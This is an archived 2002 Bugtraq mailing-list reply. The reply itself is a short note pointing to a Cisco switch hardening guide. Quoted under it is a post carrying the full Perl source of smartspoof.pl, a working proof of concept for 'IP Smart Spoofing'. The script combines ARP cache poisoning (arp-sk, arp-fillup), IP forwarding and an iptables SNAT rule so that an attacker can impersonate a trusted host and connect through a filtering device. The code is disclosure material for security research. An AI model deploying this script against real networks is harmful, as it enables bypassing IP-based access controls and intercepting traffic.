RE: Exploit code for IP Smart Spoofing

From: Stephen Gill (gillsrat_private)
Date: Wed Nov 13 2002 - 11:32:56 PST

Next message: Andrei Mikhailovsky: "Buffalo AP Denial of Service"

Previous message: securityat_private: "Security Update: [CSSA-2002-SCO.42] UnixWare 7.1.1 Open UNIX 8.0.0 : in.talkd format string vulnerabilities"
In reply to: Laurent Licour: "Exploit code for IP Smart Spoofing"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

In order to mitigate this on edge switches it may behoove the network
administrator to review his or her security policy and adhere to
stricter guidelines.  The following document suggests one method for
protecting Cisco switches along with additional guidelines for secure
configuration in a template format.

http://www.qorbit.net/documents/catalyst-secure-template.pdf
http://www.qorbit.net/documents/catalyst-secure-template.htm

Comments or suggestions welcome.
-- steve

-----Original Message-----
From: Laurent Licour [mailto:llicourat_private] 
Sent: Tuesday, November 12, 2002 6:21 AM
To: 'bugtraqat_private'
Subject: Exploit code for IP Smart Spoofing


Hello

As we reported in our previous article: IP Smartspoofing
(http://www.althes.fr/ressources/avis/smartspoofing.htm), we introduced
a
new method for IP Spoofing, allowing full-connexion from any client
software.

The exploit code smartspoof.pl is a proof of concept (for educational
purpose only) of the Smart Spoofing method

The additional software "arp-fillup" is necessary to achieve this:
http://www.althes.fr/ressources/tools/arp-fillup/arp-fillup-0.1.tgz

These tools are also available on
http://www.althes.fr/ressources/avis/smartspoofing.htm#tools


Exploit Code (perl source) :

#!/usr/bin/perl -w
#
# smartspoof.pl
#
# This script is provided as proof of concept for educational purpose
only
#
# Laurent Licour 28/10/02
# llicourat_private
# Althes (http://www.althes.fr)
#
# Start/Stop smartspoofing
# http://www.althes.fr/ressources/avis/smartspoofing.htm
#
# Require linux 2.4 (tested on Redhat 7.3)
# Require NetAddr::IP perl package (www.cpan.org)
# Require arp-sk tool (www.arp-sk.org)
# Require arp-fillup tool
(www.althes.fr/ressources/avis/smartspoofing.htm)
# Require iptables (www.iptables.org)

use strict;
use Getopt::Long;
use NetAddr::IP;

sub get_ip_next_hop
{
  my ($ip0, $int) =3D @_;
  my $ip=3Dnew NetAddr::IP $ip0;
=20
  open(ROUTE, "route -n |");
  <ROUTE>; <ROUTE>;
  my $gateway=3D"";
  my $masklen; my @fields; my $line; my $entry;
  while($line =3D <ROUTE>)
  {
    @fields =3D split / +/, $line;
    $entry=3Dnew NetAddr::IP($fields[0] . "/" . $fields[2]);
    if ($entry->contains($ip))
    {
      if (($gateway eq "") or ($masklen < $entry->masklen()))
      {
        $gateway =3D $fields[1];
        $masklen =3D $entry->masklen();
        $$int =3D $fields[7];
        chop $$int;
      }
    }
  }
  die "Error : No route for $ip \n" if ($gateway eq "");
  $gateway=3D$ip->addr() if ($gateway eq "0.0.0.0");

  return($gateway);
}

sub get_mac
{
  my $ip=3Dshift;
  my $cmd=3D"ping -c 1 -w 1 $ip >/dev/null 2>&1";
  system($cmd);
  $cmd=3D"cat /proc/net/arp | grep $ip' ' | awk '{print \$4}'";
  my $mac=3D`$cmd`;
  chop($mac);
  return($mac);
}

sub usage
{
  print "Start/Stop de smartspoofing\n\n";
  print "This is the proof of concept of the smartspoofing technique\n";
  print "(visit
http://www.althes.fr/ressources/avis/smartspoofing.htm)\n";
  print "\n";
  print "You only have to specify :\n";
  print " -D : address of the filtering equipement to connect to\n";
  print " -S : address of the trusted host to spoof\n";
  print "\n";
  print "Then, you only need to launch your favorite client software
from
this host\n";
  print "or any host behind this (because it is now a router)\n";
  print "\n";
  print "This script is provided as proof of concept for educational
purpose
only.\n";
  print "\n";

  exit 0;
}

my $syntax =3D "syntax: $0 [-i eth0] [-h] [-v] -D <\@IP destination> -S
<\@=
IP
source> -start|-stop\n";

my $ver =3D "smartspoof.pl v1.0 28/10/02\n";

my ($ipsrc, $ipdst);
my ($start, $stop);
my $interface =3D "";
my ($version, $help);

Getopt::Long::GetOptions(
           "D=3Ds" =3D> \$ipdst,
	   "S=3Ds" =3D> \$ipsrc,
	   "i=3Ds" =3D> \$interface,
	   "v" =3D> \$version,
	   "h" =3D> \$help,
	   "start" =3D> \$start,
	   "stop" =3D> \$stop
          ) or die $syntax;


usage if $help;
die $ver if $version;
die $syntax unless @ARGV =3D=3D 0;
die $syntax unless defined($ipsrc) and defined($ipdst);
die $syntax unless defined($start) or defined($stop);
die $syntax if $start and $stop;

my $cmd;

my ($intsrc, $intdst);
my $ipsrc_next_hop =3D get_ip_next_hop($ipsrc, \$intsrc);
my $ipdst_next_hop =3D get_ip_next_hop($ipdst, \$intdst);
$interface=3D$intdst if ($interface eq "");


if ($start)
{
  print "Activate IP Forwarding\n";
  system("echo 1 > /proc/sys/net/ipv4/ip_forward");

  print "Activate Arp fillup on $ipsrc\n";
  system("arp-fillup -i $interface -D $ipsrc >/dev/null 2>&1 &");

  print "Set NAT rule on iptables\n";
  $cmd=3D"iptables -t nat -A POSTROUTING -o $interface -d $ipdst -j SNAT
--=
to
$ipsrc";
  system($cmd);

  print "Desactivate ICMP Redirect\n";
  system("iptables -A OUTPUT -p icmp --icmp-type host-redirect -j
DROP");

  print "Activate Arp cache poisoning of $ipsrc_next_hop entry on
$ipdst_next_hop on $interface\n";
  $cmd=3D"arp-sk -w -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop
-D
$ipdst_next_hop -c 1 >/dev/null 2>&1";
  system($cmd);
  $cmd=3D"arp-sk -r -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop
-D
$ipdst_next_hop >/dev/null 2>&1 &";
  system($cmd);
}
elsif ($stop)
{
  print "Suppress Arp fillup on $ipsrc\n";
  system("killall arp-fillup");

  print "Suppress Arp cache poisoning of $ipsrc_next_hop entry on
$ipdst_next_hop\n";
  system("killall arp-sk");
  my $mac=3Dget_mac($ipsrc_next_hop);
  $cmd=3D"arp-sk -r -c 1 -i $interface -d $ipdst_next_hop -S
$ipsrc_next_hop:$mac -D $ipdst_next_hop >/dev/null 2>&1";
  system($cmd);

  print "Clear iptables rules\n";
  system("service iptables stop");
  system("service iptables start");

  print "Desactivate ip forwarding\n";
  system("echo 0 > /proc/sys/net/ipv4/ip_forward");
}




Regards

Laurent Licour
mailto:llicourat_private
Althes
http://www.althes.fr

=20



*---------------------------------------------------------------*
* Cet e-mail et toutes les pi=E8ces jointes sont destin=E9s aux     *
* seules personnes auxquelles ils sont sp=E9cifiquement adress=E9s  *
* et n'engagent que le signataire de ces documents et non la    *
* structure dont il d=E9pend.                                     *
* Leur existence et leur contenu ont un caract=E8re confidentiel. *
* Toute utilisation ou diffusion non autoris=E9e est interdite.   *
* Si vous avez re=E7u cet  e-mail ou si vous d=E9tenez sans en =EAtre *
* le destinataire, nous vous demandons de bien vouloir nous en  *
* informer imm=E9diatement.                                       *
* Cette note assure que ce message a =E9t=E9 contr=F4l=E9 et ne
*
* comprenait aucun virus connu =E0 ce jour, n=E9anmoins tout        *
* message =E9lectronique est susceptible d'alt=E9ration.            *
* Nous d=E9clinons toute responsabilit=E9 au titre de ce message    *
* s'il a =E9t=E9 alt=E9r=E9, d=E9form=E9 ou falsifi=E9.
=
    *
*---------------------------------------------------------------*
=20

Next message: Andrei Mikhailovsky: "Buffalo AP Denial of Service"
Previous message: securityat_private: "Security Update: [CSSA-2002-SCO.42] UnixWare 7.1.1 Open UNIX 8.0.0 : in.talkd format string vulnerabilities"
In reply to: Laurent Licour: "Exploit code for IP Smart Spoofing"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Nov 16 2002 - 00:16:56 PST